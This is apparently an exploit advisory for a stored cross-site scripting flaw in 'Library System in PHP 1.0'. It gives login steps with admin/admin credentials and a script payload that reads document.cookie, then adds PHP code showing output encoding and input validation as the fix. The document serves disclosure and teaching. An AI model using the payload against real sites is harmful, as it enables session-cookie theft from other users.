# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: V 1.0
# Tested on: WAMPP
# Description #
Library System in PHP V1.0 is vulnerable to stored cross-site scripting because of insufficient sanitisation of user-supplied data.

# Proof of Concept (PoC) :
# Exploit:
1) Go to: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Go to: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field:
<script>alert(document.cookie)</script>
5) Click on Save
6) Our payload is fired and stored
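
The description attributes the issue to insufficient sanitisation of the publisher name. As an added example (not code from Library System in PHP or from the exploit author), the PHP below contrasts rendering the stored value as-is with encoding it for the HTML context, and adds an input allow-list as defence in depth. The function names, the `<td>` markup and the allow-list pattern are hypothetical.

```php
<?php
// Added illustration; not code from Library System in PHP.
// Function names, markup and the allow-list are hypothetical.

// Vulnerable pattern: the stored value is concatenated into HTML unchanged,
// so markup saved in the publisher field is parsed by every viewer's browser.
function render_publisher_unsafe(string $name): string
{
    return '<td>' . $name . '</td>';
}

// Encode for the HTML context at output time.
// ENT_QUOTES encodes both quote styles (needed inside attribute values);
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: same markup, stored value encoded before it reaches the page.
function render_publisher_safe(string $name): string
{
    return '<td>' . e($name) . '</td>';
}

// Defence in depth on save: accept only letters, digits and a small set of
// punctuation, 1 to 100 characters. This complements output encoding and
// does not replace it.
function validate_publisher_name(string $name): bool
{
    return preg_match('/^[\p{L}\p{N} .,&\'()\-]{1,100}$/u', trim($name)) === 1;
}

// The payload from the PoC above, used here only as test input.
$stored = '<script>alert(document.cookie)</script>';

echo render_publisher_unsafe($stored), PHP_EOL; // tag reaches the browser intact
echo render_publisher_safe($stored), PHP_EOL;   // tag arrives as inert text
var_dump(validate_publisher_name($stored));           // rejected on save
var_dump(validate_publisher_name("O'Reilly & Sons")); // ordinary name accepted
```

Setting the `HttpOnly` flag on the session cookie additionally keeps `document.cookie` from exposing it to injected script.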